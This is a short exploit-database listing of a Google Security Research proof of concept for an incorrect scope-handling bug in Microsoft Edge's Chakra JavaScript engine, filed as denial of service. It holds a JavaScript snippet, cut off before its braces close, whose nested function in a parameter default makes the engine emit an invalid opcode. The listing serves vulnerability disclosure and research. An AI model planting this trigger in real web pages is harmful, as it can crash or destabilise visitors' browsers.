Microsoft Edge Chakra - Incorrect Scope Handling Exploit

ID 1337DAY-ID-29569
Type zdt
Reporter Google Security Research
Modified 2018-01-18T00:00:00


Exploit for windows platform in category dos / poc

                                            // PoC:
(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    function func() {
// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

# [2018-04-09]  #